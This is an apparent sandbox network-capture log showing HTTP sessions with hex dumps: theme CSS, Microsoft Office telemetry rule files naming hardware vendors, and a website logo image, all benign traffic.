                                                                                                                                                                                                                              Data Ascii: t_element>.row{-webkit-box-align:stretch;-webkit-align-items:stretch;-ms-flex-align:stretch;align-items:stretch}.flexbox .spb-column-container{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.flexbox .spb-column-container>.spb-co
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 2d 73 70 61 63 69 6e 67 3d 22 34 22 5d 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 34 70 78 7d 2e 73 70 62 2d 72 6f 77 5b 64 61 74 61 2d 63 6f 6c 2d 73 70 61 63 69 6e 67 3d 22 36 22 5d 20 2e 73 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 70 62 2d 72 6f 77 5b 64 61 74 61 2d 63 6f 6c 2d 73 70 61 63 69 6e 67 3d 22 36 22 5d 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 36 70 78 7d 2e 73 70 62 2d 72 6f 77 5b 64 61 74 61 2d 63 6f 6c 2d 73 70 61
                                                                                                                                                                                                                              Data Ascii: -spacing="4"] .spb-column-inner{margin-left:4px;margin-right:4px}.spb-row[data-col-spacing="6"] .spb_content_element{padding-left:3px;padding-right:3px}.spb-row[data-col-spacing="6"] .spb-column-inner{margin-left:6px;margin-right:6px}.spb-row[data-col-spa
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 70 62 2d 72 65 6d 6f 76 65 2d 65 6c 65 6d 65 6e 74 2d 73 70 61 63 69 6e 67 20 2e 72 6f 77 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 73 70 62 2d 73 65 63 74 69 6f 6e 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 7d 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f
                                                                                                                                                                                                                              Data Ascii: dding-right:0;margin-bottom:0}.spb-row-container.spb-remove-element-spacing .row{margin-left:0;margin-right:0}.spb-section.col-sm-12{width:100%;padding-left:0;padding-right:0}.flexbox .spb-column-container.col-sm-12{flex-basis:100%}.flexbox .spb-column-co
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 66 6c 65 78 62 6f 78 20 2e 73 70 62 2d 63 6f 6c 75 6d 6e 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 2d 73 6d 2d 39 7b 66 6c 65 78 2d 62 61 73 69 73 3a 31 30 30 25 7d 2e 66 77 2d 72 6f 77 3e 2e 73 70 62 2d 72 6f 77 2c 2e 73 70 62 2d 72 6f 77 5b 64 61 74 61 2d 69 6d 61 67 65 2d 6d 6f 76 65 6d 65 6e 74 3d 66 69 78 65 64 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 61 74 74 61 63 68 6d 65 6e 74 3a 6c 6f 63 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 6d 6f 64 61 6c
                                                                                                                                                                                                                              Data Ascii: n-container.col-sm-6,.flexbox .spb-column-container.col-sm-7,.flexbox .spb-column-container.col-sm-8,.flexbox .spb-column-container.col-sm-9{flex-basis:100%}.fw-row>.spb-row,.spb-row[data-image-movement=fixed]{background-attachment:local!important}}.modal
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 69 6d 61 67 65 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 76 6f 5f 70 69 78 65 6c 5f 64 61 72 6b 2e 70 6e 67 29 7d 2e 6f 76 65 72 6c 61 79 2d 6c 69 67 68 74 67 72 69 64 66 61 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 76 6f 5f 66 61 74 5f 70 69 78 65 6c 5f 6c 69 67 68 74 2e 70 6e 67 29 7d 2e 6f 76 65 72 6c 61 79 2d 64 61 72 6b 67 72 69 64 66 61 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2e 2e 2f 69 6d 67 2f 76 6f 5f 66 61 74 5f 70 69 78 65 6c 5f 64 61 72 6b 2e 70 6e 67 29 7d 2e 73 70 62 2d 72 6f 77 2d 70 61 72 61 6c 6c 61 78 20 2e 73 70 62 2d 72 6f 77 2d 70 61 72 61 6c 6c 61 78 2d 6c 61 79 65 72 2d 77 72 61 70 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 31 30 30 25
                                                                                                                                                                                                                              Data Ascii: image:url(../img/vo_pixel_dark.png)}.overlay-lightgridfat{background-image:url(../img/vo_fat_pixel_light.png)}.overlay-darkgridfat{background-image:url(../img/vo_fat_pixel_dark.png)}.spb-row-parallax .spb-row-parallax-layer-wrap{overflow:hidden;width:100%
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC1369INData Raw: 64 28 30 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 73 70 62 2d 72 6f 77 2d 65 78 70 61 6e 64 2d 74 65 78 74 2e 72 6f 77 2d 6f 70 65 6e 3a 68 6f 76 65 72 20 61 3a 68 6f 76 65 72 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 73 70 62 2d 72 6f 77 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 70 62 2d 72 6f 77 2d 65 78 70 61 6e 64 69 6e 67 7b 68 65 69 67 68 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 6f 76 65 72 66 6c
                                                                                                                                                                                                                              Data Ascii: d(0,0,0);transform:rotate(180deg) translate3d(0,0,0)}.spb-row-expand-text.row-open:hover a:hover{-webkit-transform:rotate(180deg) translate3d(0,0,0);transform:rotate(180deg) translate3d(0,0,0)}.spb-row-container.spb-row-expanding{height:0;opacity:0;overfl


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              23192.168.2.64974813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:02 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                              x-ms-request-id: bac56044-101e-0079-505d-235913000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180402Z-17fbfdc98bb75b2fuh11781a0n0000000640000000001gbt
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              24192.168.2.64974913.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:02 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                              x-ms-request-id: 13862abc-a01e-0053-5aa2-218603000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180402Z-17fbfdc98bbvf2fnx6t6w0g25n000000068g000000001p8v
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              25192.168.2.64975113.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:02 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                              x-ms-request-id: a95f3241-e01e-0020-1c5d-23de90000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180402Z-17fbfdc98bb8xnvm6t4x6ec5m4000000061g000000002zkw
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              26192.168.2.64975213.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:02 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                              x-ms-request-id: 48cb304a-401e-0064-7764-2354af000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180402Z-17fbfdc98bbkw9phumvsc7yy8w00000006100000000099z2
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              27192.168.2.64975013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:02 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                              x-ms-request-id: 1b2fb3ba-201e-0033-65ce-20b167000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180402Z-r1755647c66nfj7t97c2qyh6zg00000005b000000000bqmt
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              28192.168.2.649755141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:02 UTC373OUTGET /wp-content/uploads/2020/11/logo.png HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:03 GMT
                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                              Content-Length: 8293
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: origSize=8495
                                                                                                                                                                                                                              ETag: "64d51142-212f"
                                                                                                                                                                                                                              Last-Modified: Thu, 10 Aug 2023 16:33:06 GMT
                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 80484
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5b70b6f4862-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC903INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 d8 00 00 01 70 08 03 00 00 00 74 24 23 e9 00 00 01 d7 50 4c 54 45 4c 69 71 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 0d 31 62 00 2d 62 00 2d 62 00 2d 62 00 2d 62 00 2d 62 00 2d 62 a3 b3 05 00 2d 62 00 2d 62 73 8c 21 00 2d 62 6a 84 26 5f 7c 2c 62 7e 2a 8a 9f 13 00 2d 62 00 2d 62 00 2d 62 00 2d 62 83 99 17 00 2d 62 6e 88 23 1b 91 ba 5c 79 2e 00 2d 62 7d 94 1b 77 90 1e 92 a5 0f 9a ac 0a 13 74 a1 1d 96 bf 66 81 28 17 80 ab 22 a9 d0 59 77 2f 22 a9 d0 13 72 9f 15 79 a6 1a 8b b6 1d 96 bf 22 a9 d0 18 83 ae 12 6d 9b 1e 9c c4 14 76 a3 20 a2 ca 1b 90 ba 20 a3 cb 1e 9b c3 1c 94 bd 19 87 b2 18 83 ae 16 7c a8 1f 9d c6 1f a0 c8 12
                                                                                                                                                                                                                              Data Ascii: PNGIHDRpt$#PLTELiq1b1b1b1b1b1b1b1b1b1b1b1b1b1b1b-b-b-b-b-b-b-b-bs!-bj&_|,b~*-b-b-b-b-bn#\y.-b}wtf("Yw/"ry"mv |
                                                                                                                                                                                                                              2024-10-23 18:04:03 UTC1369INData Raw: 97 d9 36 0d be 91 6a d9 86 93 98 de 53 2d db 70 12 d3 07 cb 32 f7 6d 38 a2 a1 2d 71 30 79 f4 ef 14 3e d0 cf 35 0e 69 69 46 72 f8 bf 6e 8b 03 db 3c 6f c3 3f fa b6 c4 6f da 36 9c c1 b4 c5 19 e4 cd 8f 53 78 b7 96 38 8d 8b 89 1c de f4 f3 12 a7 52 67 87 ca ab eb 53 8e d3 59 44 1b b1 3e a3 9c ec d1 78 55 c3 96 e3 8d 68 c3 99 62 1d 57 a2 0d 86 f0 43 c9 cd 41 23 d6 61 8d 06 3f d9 bb 9b 1e a5 a1 28 0c c0 f3 13 90 82 43 46 13 86 c9 2c 58 b9 72 e5 cf d0 44 8d 89 c6 8d 46 e3 d2 68 d4 9c 7b fb 45 3f 80 52 4a 69 29 5f 3f 56 1a 63 62 72 35 19 a4 b4 f7 b6 ef b3 63 7f 4f de d3 d3 d3 8b c2 5a 1a 35 c6 00 1f 7f 41 33 5c 0f a8 51 3a 58 59 81 fa bb d7 a5 c6 c1 a2 29 d4 dc 65 87 fe 0a 03 72 00 65 b5 7b 24 c2 14 0d 40 69 57 1a 35 58 07 d7 ac 00 1e ae eb a8 87 7e 1c ea e6 72 48
                                                                                                                                                                                                                              Data Ascii: 6jS-p2m8-q0y>5iiFrn<o?o6Sx8RgSYD>xUhbWCA#a?(CF,XrDFh{E?RJi)_?Vcbr5cOZ5A3\Q:XY)ere{$@iW5X~rH
